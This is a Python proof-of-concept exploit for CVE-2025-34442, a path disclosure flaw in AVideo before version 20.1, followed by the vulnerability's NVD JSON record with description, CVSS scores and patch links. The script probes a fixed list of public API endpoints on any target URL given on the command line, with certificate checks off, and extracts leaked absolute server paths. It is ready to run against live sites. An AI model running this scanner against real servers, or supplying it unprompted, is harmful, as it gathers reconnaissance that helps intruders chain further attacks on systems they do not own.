CVE-2025-34442

# CVE-2025-34442 AVideo Path Disclosure PoC # Target: AVideo < 20.1 # Type: Information Disclosure via Public API import requests import json import sys def exploit_cve_2025_34442(target_url): """ Exploit for CVE-2025-34442 - AVideo Path Disclosure This PoC demonstrates how to extract absolute filesystem paths from vulnerable AVideo API endpoints. """ # Endpoints that may leak path information endpoints = [ "/var/AVideo/video.json", "/var/AVideo/getVideos.json", "/var/AVideo/getVideoInfo.json", "/plugin/Live/getLive.json", "/plugin/VideoHash/getVideo.json" ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-34442 - AVideo Path Disclosure\n") leaked_paths = [] for endpoint in endpoints: try: # Attempt to access API endpoints url = target_url.rstrip('/') + endpoint response = requests.get(url, timeout=10, verify=False) # Check for path leaks in response if response.status_code == 200: data = response.json() # Recursive function to find absolute paths def find_paths(obj, path=""): if isinstance(obj, dict): for key, value in obj.items(): find_paths(value, f"{path}.{key}") elif isinstance(obj, list): for i, item in enumerate(obj): find_paths(item, f"{path}[{i}]") elif isinstance(obj, str): # Check for absolute paths (Unix or Windows) if (obj.startswith('/') and len(obj) > 10) or \ (len(obj) > 3 and obj[1] == ':' and '\\' in obj): leaked_paths.append({ 'endpoint': endpoint, 'path': obj, 'json_path': path }) find_paths(data) except requests.exceptions.RequestException as e: print(f"[!] Error accessing {endpoint}: {e}") # Display results if leaked_paths: print(f"[!] Found {len(leaked_paths)} leaked path(s):\n") for leak in leaked_paths: print(f" Endpoint: {leak['endpoint']}") print(f" Path: {leak['path']}") print(f" JSON Path: {leak['json_path']}") print() else: print("[*] No path leaks detected (target may be patched)") return leaked_paths if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-34442.py <target_url>") print("Example: python cve-2025-34442.py http://avideo-server.local") sys.exit(1) target = sys.argv[1] exploit_cve_2025_34442(target)

{"cve": {"id": "CVE-2025-34442", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:54.823", "lastModified": "2025-12-19T19:15:51.860", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "AVideo versions prior to 20.1 disclose absolute filesystem paths via multiple public API endpoints. Returned metadata includes full server paths to media files, revealing underlying filesystem structure and facilitating more effective attack chains."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.0", "matchCriteriaId": "383A7EA7-DFBC-4127-981F-552BFD0B3CED"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/commit/4a53ab2056", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/commit/dbe3e91c54", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.vulncheck.com/advisories/avideo-system-path-disclosure-via-public-api", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}